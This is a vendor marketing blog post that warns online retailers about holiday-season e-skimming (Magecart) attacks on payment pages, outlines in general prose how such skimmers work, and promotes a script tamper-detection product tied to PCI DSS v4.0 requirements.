We’re entering the peak of the holiday season, and for e-commerce sites, it’s not just the busiest time of the year, it’s also the most profitable with most relying on these few weeks to make up to 26% of their annual revenue. 

‍

But the higher volume of transactions also opens the door to more gaps and threats, with online retailers reporting that cyberattacks increase by around 30% during the holidays.

‍

As you deck the digital halls with cheer and discounts, you’ll also want to fortify the defences of your online payment pages. It’s not just about stopping hackers, but protecting that hard-earned trust and brand reputation you’ve built with your customers.

The High Costs of e-Skimming Attacks

A cyberattack can financially hit you in at least three ways: downtime, reputational damage, and fines/penalties for non-compliance with key standards, like PCI DSS. 

Downtime

According to an ITIC study, downtime resulting from a cyberattack can cost businesses around $8,000 to $20,000 per hour. These costs can come from a range of factors, including direct loss due to customers not completing their transactions, operational disruptions, or recovery after an attack. In fact, recovering from cybersecurity incidents could cost up to $653,587 on average. 

Reputational Damage

Whether it’s downtime, a data breach, or some other type of cyberattack, the resulting damage to your reputation can also be costly. For example, a Ping study found that 78% of consumers will stop engaging with a brand online if that brand experienced an attack. Over one-third would stop buying from that brand altogether following a breach. Worse, 85% of consumers would also share their negative experiences resulting from a breach with others.

Non-Compliance Penalties

Finally, a cyberattack can also lead to hefty non-compliance fees and/or legal fines. The actual cost can vary depending on the type of attack and the resulting problems (such as lawsuits and settlements). However, as the high-profile breaches at Target, British Airways, and others show, these costs can amount to potentially millions of dollars.

‍

When you take these three factors together, you could end up with a hefty bill at the end of a cyberattack. According to an IBM study, the total cost can average around $4.88 million across lost sales due to downtime, reputational loss, and non-compliance penalties.

‍

When your goal this holiday is to drive a big revenue bump, the last thing you’d want is all that momentum getting sunk by a costly cyberattack, which could pull you into revenue loss.

Common Cybersecurity Threats During the Holidays

Online stores are designed to be as user-friendly and accessible as possible. Not only that, but they’re loaded with plugins and tools built for measuring traffic, tracking how users interact with pages, and driving people to make purchases. 

‍

Sadly, while all of these elements are great (and necessary) for driving sales, they also create a lot of potential gaps for bad actors to attack. 

‍

There are a few notable types of attacks, such as distributed denial-of-service (DDoS), phishing, and bad bot attacks. But there’s one that can go unnoticed and cause both short- and long-term problems: e-commerce card skimming (or e-skimming for short). 

‍

Like card-skimming, e-skimming aims to steal customer payment card information, but through online storefronts, particularly payment pages. The most well-known type of e-skimming attack is Magecart, which struck British Airways, Ticketmaster, Newegg, and other major merchants.

‍

Magecart attacks typically involve three main steps:

‍

First, the attacker gains access to an e-commerce website through a vulnerability, which could either be the website’s own infrastructure or via a third-party plugin or tool.

‍

Second, the attacker injects malicious JavaScript code into the payment pages. This code then runs on the customer’s browser. 

‍

Third, the malicious code will ‘skim’ the customer’s payment information as they try completing a purchase. The stolen data is then sent to servers controlled by the attacker. 

‍

These attacks often go unnoticed by both the merchant and the customer. 

‍

To the customer, the compromised environment largely looks and feels legitimate. Transactions complete normally with no visible signs of tampering. 

‍

As for merchants, they get the customer’s payment card as normal while at the same time the skimmer is stealing it. Some attackers will disguise their malicious code as legitimate services, like common third-party tools such as an analytics plugin. Attackers will also encrypt the stolen data and send it as genuine-looking HTTP requests, making it hard for merchants to parse out the data flows for anything that looks suspicious or compromised. 

‍

When attackers target a page, they may only skim from 1-2% of the transactions. In peak shopping periods like the holidays, strange trends involving those customers might be mistaken for seasonal fluctuations. This is how sophisticated e-skimming attacks get another reason why they’re difficult to detect.

‍

So, how do Magecart attacks happen? Let’s say you use an analytics plugin to track customer traffic. To get this plugin to collect web traffic data, you’d add JavaScript code into the payment page. Now, imagine if an attacker compromises that analytics plugin and changes how that plugin works, perhaps by adding another script into your page. 

‍

Today, some 99% of websites use JavaScript. Not only that, but the average e-commerce site could use dozens of third-party scripts. So, while your website might be secure in of itself, your plugin vendors may not be as well protected. A gap on their end is also a gap on your end. 

Keep the Festive Season Happy by Securing Your Web Assets

The holiday season is a key sales period for you, but the larger transaction volume also attracts bad actors and leads to more attacks. Each holiday shopping season, Zscaler sees a spike in e-skimming attacks. Worse, the attacks are also getting more sophisticated. For example, bad actors are focusing more on third-parties (like that analytics plugin).

‍

While the threat landscape is tough, the good news is that you do have tools and processes to help secure your e-commerce website. 

‍

One of these measures - and arguably the most important one - is becoming compliant with PCI DSS v4.0. It sets out many steps for auditing your scripts and setting up mechanisms to monitor them for unauthorized changes or other risks (learn more about those steps in our other blog).

‍

To make implementing these policies easier and, more importantly, properly protecting yourself in both today’s and tomorrow’s threat environment, you also need the right tools.

‍

Look for something that monitors your payment pages around-the-clock and blocks malicious code from executing. You should also make sure it’s not something an attacker can’t modify or circumvent. The right investment here can protect you from costly issues later.

‍

DataStealth’s Tamper Detection and Protection (TDP) solution provides real-time coverage of your payment pages. TDP ensures that only the scripts you authorized for use will load, while preventing unauthorized scripts from executing. Moreover, TDP helps you meet and exceed PCI DSS v4.0’s requirements 6.4.3 and 11.6.1, thereby making compliance easier. 

‍

Book a demo to see TDP in action and how it could help fortify your e-commerce website.

‍